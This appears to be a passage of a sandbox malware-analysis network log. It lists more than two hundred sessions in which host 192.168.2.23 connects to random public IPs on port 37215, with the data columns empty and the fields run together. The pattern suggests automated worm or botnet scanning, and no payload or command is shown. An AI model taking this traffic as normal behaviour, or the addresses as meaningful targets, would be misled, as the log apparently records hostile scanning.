                                          15698192.168.2.235801641.218.219.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15699192.168.2.2347376200.55.214.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15700192.168.2.2356196159.34.51.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15701192.168.2.233288441.14.167.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15702192.168.2.2337566157.53.210.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15703192.168.2.235806641.242.127.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15704192.168.2.234387441.69.90.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15705192.168.2.2356126197.101.14.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15706192.168.2.2355526197.204.168.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15707192.168.2.2341330197.111.55.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15708192.168.2.235203441.226.109.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15709192.168.2.23446841.16.59.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15710192.168.2.2355724157.229.242.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15711192.168.2.2353996158.74.250.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15712192.168.2.235996441.53.243.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15713192.168.2.2336712197.199.91.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15714192.168.2.2344532197.134.212.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15715192.168.2.234174841.94.106.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15716192.168.2.235596041.70.125.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15717192.168.2.2339366197.41.105.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15718192.168.2.2356066157.253.70.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15719192.168.2.2359112157.216.145.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15720192.168.2.235802236.131.164.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15721192.168.2.2354302197.146.107.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15722192.168.2.2337572197.235.243.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15723192.168.2.2352752197.20.181.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15724192.168.2.2340386197.76.2.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15725192.168.2.2353060212.110.93.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15726192.168.2.235933241.133.69.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15727192.168.2.2350430197.35.245.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15728192.168.2.234449441.145.232.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15729192.168.2.2340650197.251.197.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15730192.168.2.2360578157.229.178.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15731192.168.2.2353902157.130.255.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15732192.168.2.2347472157.124.186.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15733192.168.2.2350724115.62.11.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15734192.168.2.2346202197.223.240.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15735192.168.2.2342958157.113.120.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15736192.168.2.2344016197.226.73.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15737192.168.2.2341348157.191.87.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15738192.168.2.2338692157.201.106.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15739192.168.2.2348254157.124.28.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15740192.168.2.2343184157.229.70.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15741192.168.2.233768271.183.60.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15742192.168.2.235364641.111.84.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15743192.168.2.2348278187.166.176.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15744192.168.2.234330041.145.83.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15745192.168.2.2360530193.158.118.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15746192.168.2.236030641.173.151.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15747192.168.2.2355234157.176.147.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15748192.168.2.2359004157.245.18.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15749192.168.2.233329641.210.8.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15750192.168.2.2353794197.156.107.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15751192.168.2.234267241.242.31.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15752192.168.2.235224241.73.190.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15753192.168.2.2353778197.35.38.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15754192.168.2.235420041.145.27.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15755192.168.2.235180262.79.212.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15756192.168.2.2347934197.112.155.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15757192.168.2.2351716124.164.250.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15758192.168.2.235484241.51.86.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15759192.168.2.2357508157.124.136.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15760192.168.2.2357124157.87.113.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15761192.168.2.234553418.106.88.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15762192.168.2.2334456157.45.227.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15763192.168.2.2343604157.79.201.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15764192.168.2.2351460157.242.73.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15765192.168.2.233782241.235.40.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15766192.168.2.233520441.132.42.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15767192.168.2.2345540157.255.75.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15768192.168.2.2354274157.9.124.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15769192.168.2.2348664197.226.202.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15770192.168.2.2344564157.175.136.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15771192.168.2.2354228175.130.24.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15772192.168.2.233525841.206.76.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15773192.168.2.2339984210.2.225.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15774192.168.2.233995241.233.27.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15775192.168.2.233398441.17.248.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15776192.168.2.2343970197.172.221.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15777192.168.2.236048041.235.18.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15778192.168.2.233589241.45.185.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15779192.168.2.2357852192.190.46.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15780192.168.2.2333028181.244.214.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15781192.168.2.2351014157.89.246.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15782192.168.2.2340662197.19.5.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15783192.168.2.233921441.125.188.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15784192.168.2.2340208197.38.162.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15785192.168.2.2339870221.109.85.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15786192.168.2.2341634197.236.206.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15787192.168.2.2345066157.84.174.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15788192.168.2.2351578157.217.151.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15789192.168.2.234622649.83.151.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15790192.168.2.2337880197.147.255.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15791192.168.2.233992441.22.18.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15792192.168.2.235031041.232.133.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15793192.168.2.2343656197.88.98.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15794192.168.2.2337794157.12.145.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15795192.168.2.2359512197.91.68.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15796192.168.2.235249441.146.175.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15797192.168.2.2343610157.53.159.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15798192.168.2.235382641.103.187.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15799192.168.2.2358028104.137.251.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15800192.168.2.233333041.180.40.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15801192.168.2.236060041.121.61.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15802192.168.2.2360188168.190.76.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15803192.168.2.2353212157.6.129.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15804192.168.2.2341984197.145.175.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15805192.168.2.2359588197.44.222.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15806192.168.2.2352654197.109.40.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15807192.168.2.235594060.141.227.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15808192.168.2.235980812.104.112.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15809192.168.2.235264441.218.166.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15810192.168.2.2347198131.4.88.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15811192.168.2.235257041.4.219.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15812192.168.2.2344402157.209.169.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15813192.168.2.235658459.247.204.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15814192.168.2.233965241.83.144.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15815192.168.2.2353198157.52.175.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15816192.168.2.234318841.117.222.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15817192.168.2.2357948197.205.172.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15818192.168.2.2360670197.185.216.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15819192.168.2.2342246157.56.0.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15820192.168.2.2355850157.96.131.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15821192.168.2.234921041.216.54.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15822192.168.2.235351041.34.113.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15823192.168.2.2356514197.183.110.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15824192.168.2.235696038.61.32.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15825192.168.2.2358944198.98.149.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15826192.168.2.2349510197.11.151.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15827192.168.2.236089880.139.225.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15828192.168.2.233958489.213.46.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15829192.168.2.2355826157.99.89.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15830192.168.2.2356846157.179.71.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15831192.168.2.2351278206.5.95.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15832192.168.2.2339116157.169.86.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15833192.168.2.2345108197.13.209.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15834192.168.2.2337590157.73.177.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15835192.168.2.2333754141.69.108.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15836192.168.2.2358762128.75.128.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15837192.168.2.2346136197.35.155.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15838192.168.2.235425671.118.133.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15839192.168.2.2338134157.251.204.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15840192.168.2.2353648157.196.171.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15841192.168.2.233824841.202.54.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15842192.168.2.233612620.33.226.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15843192.168.2.2355730210.4.174.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15844192.168.2.2353656157.170.236.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15845192.168.2.233882441.237.172.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15846192.168.2.2357144203.21.127.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15847192.168.2.2338598157.2.178.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15848192.168.2.234180234.104.236.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15849192.168.2.2346138157.154.122.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15850192.168.2.2353992157.248.240.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15851192.168.2.2352640157.164.36.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15852192.168.2.236035241.138.91.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15853192.168.2.234656841.100.173.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15854192.168.2.2358158197.105.254.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15855192.168.2.2339188197.80.100.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15856192.168.2.234818441.13.111.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15857192.168.2.2340494197.224.31.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15858192.168.2.235013441.119.136.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15859192.168.2.2339960157.27.253.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15860192.168.2.2358436157.13.53.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15861192.168.2.2344388197.210.51.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15862192.168.2.2334560159.188.191.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15863192.168.2.2360744197.195.28.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15864192.168.2.234851241.111.162.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15865192.168.2.2349134193.253.137.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15866192.168.2.2359064197.16.211.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15867192.168.2.2342852157.40.248.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15868192.168.2.2333782157.189.47.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15869192.168.2.2351036157.49.172.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15870192.168.2.2360266119.13.209.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15871192.168.2.2360720189.152.104.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15872192.168.2.2352990207.143.229.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15873192.168.2.234547683.140.103.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15874192.168.2.2354116157.154.17.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15875192.168.2.2336500157.103.85.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15876192.168.2.2339474197.226.22.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15877192.168.2.2343866197.255.151.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15878192.168.2.2347424157.225.27.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15879192.168.2.2337588197.150.253.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15880192.168.2.2349104158.108.64.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15881192.168.2.234026841.165.213.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15882192.168.2.233582641.83.54.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15883192.168.2.235749841.147.215.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15884192.168.2.2354010197.143.50.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15885192.168.2.2342880197.250.78.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15886192.168.2.235226041.85.202.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15887192.168.2.234459441.20.150.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15888192.168.2.234222441.82.104.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15889192.168.2.234491041.133.21.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15890192.168.2.234325674.38.106.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15891192.168.2.2353492197.141.113.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15892192.168.2.235231841.45.14.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15893192.168.2.2353572197.187.165.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15894192.168.2.2336604157.232.246.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15895192.168.2.2335830157.84.151.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15896192.168.2.2337686178.164.188.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15897192.168.2.2343888197.44.150.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15898192.168.2.2337976197.146.171.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15899192.168.2.2336370197.231.2.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15900192.168.2.235776041.40.47.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15901192.168.2.2336298197.20.199.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15902192.168.2.235048241.154.175.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15903192.168.2.2351438157.130.234.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15904192.168.2.2333020197.34.175.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15905192.168.2.2350938157.48.171.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15906192.168.2.2358884168.228.199.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15907192.168.2.2351514157.191.75.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15908192.168.2.2339420197.66.220.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15909192.168.2.2359886197.19.132.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15910192.168.2.2353478157.113.135.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15911192.168.2.2348782147.18.216.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15912192.168.2.2334664198.244.163.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15913192.168.2.2355288157.88.186.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15914192.168.2.2345986123.111.242.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15915192.168.2.2336034197.242.95.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15916192.168.2.234110641.123.250.19837215
